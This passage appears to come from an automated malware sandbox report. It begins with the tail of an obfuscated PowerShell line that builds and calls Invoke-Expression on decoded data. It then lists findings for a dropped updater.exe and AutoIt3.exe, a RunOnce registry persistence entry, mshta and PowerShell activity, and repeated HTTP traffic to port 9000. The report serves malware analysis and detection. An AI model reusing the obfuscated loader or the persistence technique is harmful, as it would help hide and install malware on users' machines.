_).Value.Name-ilike'*Cm*t'}).Name).Invoke((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand.(((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand|Get-Member|Where-Object{(Get-Variable _).Value.Name-ilike'G*om*e'}).Name).Invoke('In*-Ex*ion',$TRUE,$TRUE))([String]::Join('',(((Get-Item Variable:\t8).Value.((((Get-Item Variable:\t8).Value|Get-Member)|Where-Object{(Get-Variable _).Value.Name-ilike'*nl*a'}).Name).Invoke((GCI Variable:\s).Value)|ForEach{(Get-Item Variable:/_).Value-As'Char'}))))
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exe | Code function: 14_2_0103C6D9 LoadLibraryA,GetProcAddress, | 14_2_0103C6D9
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_046F27FF push esp; ret | 2_2_046F2849
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_046F4960 push 08081351h; ret | 2_2_046F4A55
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_046F4A48 push 08081351h; ret | 2_2_046F4A55
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_046F11CD pushfd ; iretd | 2_2_046F11D2
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_007720C5 push edi; ret | 4_2_007720F2
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00770DBD pushfd ; iretd | 4_2_00770DC2
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exe | Code function: 14_2_00FE8B75 push ecx; ret | 14_2_00FE8B88
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exe | Code function: 14_2_016081F1 push 0160821Dh; ret | 14_2_01608215
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exe | Code function: 14_2_01606069 push 01606095h; ret | 14_2_0160608D
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exe | Code function: 14_2_01609069 push 01609095h; ret | 14_2_0160908D
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exe | Code function: 14_2_01606031 push 0160605Dh; ret | 14_2_01606055
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exe | Code function: 14_2_016060F9 push 01606125h; ret | 14_2_0160611D
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exe | Code function: 14_2_016060D9 push 01606125h; ret | 14_2_0160611D
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exe | Code function: 14_2_016060A1 push 016060CDh; ret | 14_2_016060C5
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exe | Code function: 14_2_015F408D push 015F40B9h; ret | 14_2_015F40B1
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exe | Code function: 14_2_015FA3DF push 015FA450h; ret | 14_2_015FA448
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exe | Code function: 14_2_015FA3E1 push 015FA450h; ret | 14_2_015FA448
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exe | Code function: 14_2_016023A1 push ecx; mov dword ptr [esp], ecx | 14_2_016023A6
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exe | Code function: 14_2_015FA261 push 015FA3DDh; ret | 14_2_015FA3D5
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exe | Code function: 14_2_016092B1 push 016092FDh; ret | 14_2_016092F5
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exe | Code function: 14_2_016052BD push 016052E9h; ret | 14_2_016052E1
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exe | Code function: 14_2_01600529 push 0160059Fh; ret | 14_2_01600597
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exe | Code function: 14_2_016005A1 push 01600649h; ret | 14_2_01600641
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exe | Code function: 14_2_015FA459 push 015FA48Dh; ret | 14_2_015FA485
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exe | Code function: 14_2_0160A47D push 0160A4A9h; ret | 14_2_0160A4A1
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exe | Code function: 14_2_0160A445 push 0160A471h; ret | 14_2_0160A469
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exe | Code function: 14_2_015FA461 push 015FA48Dh; ret | 14_2_015FA485
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exe | Code function: 14_2_0160A4BB push 0160A4E9h; ret | 14_2_0160A4E1
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exe | Code function: 14_2_0160A4BD push 0160A4E9h; ret | 14_2_0160A4E1
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exe | Code function: 14_2_0160470B push 01604739h; ret | 14_2_01604731
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exe | Code function: 14_2_0160470D push 01604739h; ret | 14_2_01604731
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\33260509\updater.exe
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exe | File created: C:\faggbgb\AutoIt3.exe
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce ggkfcbc

                    Hooking and other Techniques for Hiding and Protection

                    Source: unknown | Network traffic detected: HTTP traffic on port 49737 -> 9000
                    Source: unknown | Network traffic detected: HTTP traffic on port 9000 -> 49737
                    Source: unknown | Network traffic detected: HTTP traffic on port 49739 -> 9000
                    Source: unknown | Network traffic detected: HTTP traffic on port 9000 -> 49739
                    Source: unknown | Network traffic detected: HTTP traffic on port 49740 -> 9000
                    Source: unknown | Network traffic detected: HTTP traffic on port 9000 -> 49740
                    Source: unknown | Network traffic detected: HTTP traffic on port 49742 -> 9000
                    Source: unknown | Network traffic detected: HTTP traffic on port 9000 -> 49742
                    Source: unknown | Network traffic detected: HTTP traffic on port 49743 -> 9000
                    Source: unknown | Network traffic detected: HTTP traffic on port 9000 -> 49743
                    Source: unknown | Network traffic detected: HTTP traffic on port 49745 -> 9000
                    Source: unknown | Network traffic detected: HTTP traffic on port 9000 -> 49745
                    Source: unknown | Network traffic detected: HTTP traffic on port 49746 -> 9000
                    Source: unknown | Network traffic detected: HTTP traffic on port 9000 -> 49746
                    Source: unknown | Network traffic detected: HTTP traffic on port 49748 -> 9000
                    Source: unknown | Network traffic detected: HTTP traffic on port 9000 -> 49748
                    Source: unknown | Network traffic detected: HTTP traffic on port 49749 -> 9000
                    Source: unknown | Network traffic detected: HTTP traffic on port 9000 -> 49749
                    Source: unknown | Network traffic detected: HTTP traffic on port 49751 -> 9000
                    Source: unknown | Network traffic detected: HTTP traffic on port 9000 -> 49751
                    Source: unknown | Network traffic detected: HTTP traffic on port 49753 -> 9000
                    Source: unknown | Network traffic detected: HTTP traffic on port 9000 -> 49753
                    Source: unknown | Network traffic detected: HTTP traffic on port 49754 -> 9000
                    Source: unknown | Network traffic detected: HTTP traffic on port 9000 -> 49754
                    Source: unknown | Network traffic detected: HTTP traffic on port 49756 -> 9000
                    Source: unknown | Network traffic detected: HTTP traffic on port 9000 -> 49756
                    Source: unknown | Network traffic detected: HTTP traffic on port 49757 -> 9000
                    Source: unknown | Network traffic detected: HTTP traffic on port 9000 -> 49757
                    Source: unknown | Network traffic detected: HTTP traffic on port 49760 -> 9000
                    Source: unknown | Network traffic detected: HTTP traffic on port 9000 -> 49760
                    Source: unknown | Network traffic detected: HTTP traffic on port 49761 -> 9000
                    Source: unknown | Network traffic detected: HTTP traffic on port 9000 -> 49761
                    Source: unknown | Network traffic detected: HTTP traffic on port 49763 -> 9000
                    Source: unknown | Network traffic detected: HTTP traffic on port 9000 -> 49763
                    Source: unknown | Network traffic detected: HTTP traffic on port 49765 -> 9000
                    Source: unknown | Network traffic detected: HTTP traffic on port 9000 -> 49765
                    Source: unknown | Network traffic detected: HTTP traffic on port 49766 -> 9000
                    Source: unknown | Network traffic detected: HTTP traffic on port 9000 -> 49766
                    Source: unknown | Network traffic detected: HTTP traffic on port 49768 -> 9000
                    Source: unknown | Network traffic detected: HTTP traffic on port 9000 -> 49768
                    Source: unknown | Network traffic detected: HTTP traffic on port 49769 -> 9000
                    Source: unknown | Network traffic detected: HTTP traffic on port 9000 -> 49769
                    Source: unknown | Network traffic detected: HTTP traffic on port 49771 -> 9000
                    Source: unknown | Network traffic detected: HTTP traffic on port 9000 -> 49771
                    Source: unknown | Network traffic detected: HTTP traffic on port 49772 -> 9000
                    Source: unknown | Network traffic detected: HTTP traffic on port 9000 -> 49772
                    Source: unknown | Network traffic detected: HTTP traffic on port 49774 -> 9000
                    Source: unknown | Network traffic detected: HTTP traffic on port 9000 -> 49774
                    Source: unknown | Network traffic detected: HTTP traffic on port 49775 -> 9000
                    Source: unknown | Network traffic detected: HTTP traffic on port 9000 -> 49775
                    Source: unknown | Network traffic detected: HTTP traffic on port 49777 -> 9000
                    Source: unknown | Network traffic detected: HTTP traffic on port 9000 -> 49777
                    Source: unknown | Network traffic detected: HTTP traffic on port 49779 -> 9000
                    Source: unknown | Network traffic detected: HTTP traffic on port 9000 -> 49779
                    Source: unknown | Network traffic detected: HTTP traffic on port 49780 -> 9000
                    Source: unknown | Network traffic detected: HTTP traffic on port 9000 -> 49780
                    Source: unknown | Network traffic detected: HTTP traffic on port 49782 -> 9000
                    Source: unknown | Network traffic detected: HTTP traffic on port 9000 -> 49782
                    Source: unknown | Network traffic detected: HTTP traffic on port 49783 -> 9000
                    Source: unknown | Network traffic detected: HTTP traffic on port 9000 -> 49783
                    Source: unknown | Network traffic detected: HTTP traffic on port 49785 -> 9000
                    Source: unknown | Network traffic detected: HTTP traffic on port 9000 -> 49785
                    Source: unknown | Network traffic detected: HTTP traffic on port 49786 -> 9000
                    Source: unknown | Network traffic detected: HTTP traffic on port 9000 -> 49786
                    Source: unknown | Network traffic detected: HTTP traffic on port 49788 -> 9000
                    Source: unknown | Network traffic detected: HTTP traffic on port 9000 -> 49788
                    Source: unknown | Network traffic detected: HTTP traffic on port 49789 -> 9000
                    Source: unknown | Network traffic detected: HTTP traffic on port 9000 -> 49789
                    Source: unknown | Network traffic detected: HTTP traffic on port 49791 -> 9000
                    Source: unknown | Network traffic detected: HTTP traffic on port 9000 -> 49791
                    Source: unknown | Network traffic detected: HTTP traffic on port 49793 -> 9000
                    Source: unknown | Network traffic detected: HTTP traffic on port 9000 -> 49793
                    Source: unknown | Network traffic detected: HTTP traffic on port 49794 -> 9000
                    Source: unknown | Network traffic detected: HTTP traffic on port 9000 -> 49794
                    Source: unknown | Network traffic detected: HTTP traffic on port 49796 -> 9000
                    Source: unknown | Network traffic detected: HTTP traffic on port 9000 -> 49796
                    Source: unknown | Network traffic detected: HTTP traffic on port 49797 -> 9000
                    Source: unknown | Network traffic detected: HTTP traffic on port 9000 -> 49797
                    Source: unknown | Network traffic detected: HTTP traffic on port 49799 -> 9000
                    Source: unknown | Network traffic detected: HTTP traffic on port 9000 -> 49799
                    Source: unknown | Network traffic detected: HTTP traffic on port 49800 -> 9000
                    Source: unknown | Network traffic detected: HTTP traffic on port 9000 -> 49800
                    Source: unknown | Network traffic detected: HTTP traffic on port 49802 -> 9000
                    Source: unknown | Network traffic detected: HTTP traffic on port 9000 -> 49802
                    Source: unknown | Network traffic detected: HTTP traffic on port 49803 -> 9000
                    Source: unknown | Network traffic detected: HTTP traffic on port 9000 -> 49803
                    Source: unknown | Network traffic detected: HTTP traffic on port 49805 -> 9000
                    Source: unknown | Network traffic detected: HTTP traffic on port 9000 -> 49805
                    Source: unknown | Network traffic detected: HTTP traffic on port 49807 -> 9000
                    Source: unknown | Network traffic detected: HTTP traffic on port 9000 -> 49807
                    Source: unknown | Network traffic detected: HTTP traffic on port 49808 -> 9000
                    Source: unknown | Network traffic detected: HTTP traffic on port 9000 -> 49808
                    Source: unknown | Network traffic detected: HTTP traffic on port 49811 -> 9000
                    Source: unknown | Network traffic detected: HTTP traffic on port 9000 -> 49811
                    Source: unknown | Network traffic detected: HTTP traffic on port 49812 -> 9000
                    Source: unknown | Network traffic detected: HTTP traffic on port 9000 -> 49812
                    Source: unknown | Network traffic detected: HTTP traffic on port 49813 -> 9000
                    Source: unknown | Network traffic detected: HTTP traffic on port 9000 -> 49813
                    Source: unknown | Network traffic detected: HTTP traffic on port 49814 -> 9000
                    Source: unknown | Network traffic detected: HTTP traffic on port 9000 -> 49814
                    Source: unknown | Network traffic detected: HTTP traffic on port 49816 -> 9000
                    Source: unknown | Network traffic detected: HTTP traffic on port 9000 -> 49816
                    Source: unknown | Network traffic detected: HTTP traffic on port 49819 -> 9000
                    Source: unknown | Network traffic detected: HTTP traffic on port 9000 -> 49819
                    Source: unknown | Network traffic detected: HTTP traffic on port 49820 -> 9000
                    Source: unknown | Network traffic detected: HTTP traffic on port 9000 -> 49820
                    Source: unknown | Network traffic detected: HTTP traffic on port 49821 -> 9000
                    Source: unknown | Network traffic detected: HTTP traffic on port 9000 -> 49821
                    Source: unknown | Network traffic detected: HTTP traffic on port 49823 -> 9000
                    Source: unknown | Network traffic detected: HTTP traffic on port 9000 -> 49823
                    Source: unknown | Network traffic detected: HTTP traffic on port 49824 -> 9000
                    Source: unknown | Network traffic detected: HTTP traffic on port 9000 -> 49824
                    Source: unknown | Network traffic detected: HTTP traffic on port 49825 -> 9000
                    Source: unknown | Network traffic detected: HTTP traffic on port 9000 -> 49825
                    Source: unknown | Network traffic detected: HTTP traffic on port 49826 -> 9000
                    Source: unknown | Network traffic detected: HTTP traffic on port 9000 -> 49826
                    Source: unknown | Network traffic detected: HTTP traffic on port 49828 -> 9000
                    Source: unknown | Network traffic detected: HTTP traffic on port 9000 -> 49828
                    Source: unknown | Network traffic detected: HTTP traffic on port 49829 -> 9000
                    Source: unknown | Network traffic detected: HTTP traffic on port 9000 -> 49829
                    Source: unknown | Network traffic detected: HTTP traffic on port 49830 -> 9000
                    Source: unknown | Network traffic detected: HTTP traffic on port 9000 -> 49830
                    Source: unknown | Network traffic detected: HTTP traffic on port 49831 -> 9000
                    Source: unknown | Network traffic detected: HTTP traffic on port 9000 -> 49831
                    Source: unknown | Network traffic detected: HTTP traffic on port 49832 -> 9000
                    Source: unknown | Network traffic detected: HTTP traffic on port 9000 -> 49832
                    Source: unknown | Network traffic detected: HTTP traffic on port 49833 -> 9000
                    Source: unknown | Network traffic detected: HTTP traffic on port 9000 -> 49833
                    Source: unknown | Network traffic detected: HTTP traffic on port 49834 -> 9000
                    Source: unknown | Network traffic detected: HTTP traffic on port 9000 -> 49834
                    Source: unknown | Network traffic detected: HTTP traffic on port 49835 -> 9000
                    Source: unknown | Network traffic detected: HTTP traffic on port 9000 -> 49835
                    Source: unknown | Network traffic detected: HTTP traffic on port 49836 -> 9000
                    Source: unknown | Network traffic detected: HTTP traffic on port 9000 -> 49836
                    Source: unknown | Network traffic detected: HTTP traffic on port 49837 -> 9000
                    Source: unknown | Network traffic detected: HTTP traffic on port 9000 -> 49837
                    Source: unknown | Network traffic detected: HTTP traffic on port 49838 -> 9000
                    Source: unknown | Network traffic detected: HTTP traffic on port 9000 -> 49838
                    Source: unknown | Network traffic detected: HTTP traffic on port 49839 -> 9000
                    Source: unknown | Network traffic detected: HTTP traffic on port 9000 -> 49839
                    Source: unknown | Network traffic detected: HTTP traffic on port 49840 -> 9000
                    Source: unknown | Network traffic detected: HTTP traffic on port 9000 -> 49840
                    Source: unknown | Network traffic detected: HTTP traffic on port 49841 -> 9000
                    Source: unknown | Network traffic detected: HTTP traffic on port 9000 -> 49841
                    Source: unknown | Network traffic detected: HTTP traffic on port 49842 -> 9000
                    Source: unknown | Network traffic detected: HTTP traffic on port 9000 -> 49842
                    Source: unknown | Network traffic detected: HTTP traffic on port 49843 -> 9000
                    Source: unknown | Network traffic detected: HTTP traffic on port 9000 -> 49843
                    Source: unknown | Network traffic detected: HTTP traffic on port 49844 -> 9000
                    Source: unknown | Network traffic detected: HTTP traffic on port 9000 -> 49844
                    Source: unknown | Network traffic detected: HTTP traffic on port 49845 -> 9000
                    Source: unknown | Network traffic detected: HTTP traffic on port 9000 -> 49845
                    Source: unknown | Network traffic detected: HTTP traffic on port 49846 -> 9000
                    Source: unknown | Network traffic detected: HTTP traffic on port 9000 -> 49846
                    Source: unknown | Network traffic detected: HTTP traffic on port 49847 -> 9000
                    Source: unknown | Network traffic detected: HTTP traffic on port 9000 -> 49847
                    Source: unknown | Network traffic detected: HTTP traffic on port 49848 -> 9000
                    Source: unknown | Network traffic detected: HTTP traffic on port 9000 -> 49848
                    Source: unknown | Network traffic detected: HTTP traffic on port 49849 -> 9000
                    Source: unknown | Network traffic detected: HTTP traffic on port 9000 -> 49849
                    Source: unknown | Network traffic detected: HTTP traffic on port 49850 -> 9000
                    Source: unknown | Network traffic detected: HTTP traffic on port 9000 -> 49850
                    Source: unknown | Network traffic detected: HTTP traffic on port 49851 -> 9000
                    Source: unknown | Network traffic detected: HTTP traffic on port 9000 -> 49851
                    Source: unknown | Network traffic detected: HTTP traffic on port 49852 -> 9000
                    Source: unknown | Network traffic detected: HTTP traffic on port 9000 -> 49852
                    Source: unknown | Network traffic detected: HTTP traffic on port 49853 -> 9000
                    Source: unknown | Network traffic detected: HTTP traffic on port 9000 -> 49853
                    Source: unknown | Network traffic detected: HTTP traffic on port 49854 -> 9000
                    Source: unknown | Network traffic detected: HTTP traffic on port 9000 -> 49854
                    Source: unknown | Network traffic detected: HTTP traffic on port 49855 -> 9000
                    Source: unknown | Network traffic detected: HTTP traffic on port 9000 -> 49855
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49856
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49857
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49860
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49861
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49862
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49863
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49864
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49865
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49866
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49867
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49869
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49870
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49871
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49872
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49873
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49874
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49876
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49877
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49878
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49879
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49880
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49881
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49882
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49883
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49884
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49885
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49886
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49887
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49888
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49889
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49890
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49891
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49892
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49894
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49895
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49896
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49897
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49898
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49899
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49901 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49901
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49903 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49903
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49904
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49905
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49906
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49907
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49909
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exe | Code function: 14_2_010459B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 14_2_010459B3
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exe | Code function: 14_2_00FD5EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 14_2_00FD5EDA
                    Source: C:\faggbgb\AutoIt3.exe | Code function: 16_2_00A259B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 16_2_00A259B3
                    Source: C:\faggbgb\AutoIt3.exe | Code function: 16_2_009B5EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 16_2_009B5EDA
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exe | Code function: 14_2_00FE33B7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 14_2_00FE33B7
                    Source: C:\Windows\SysWOW64\mshta.exe | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
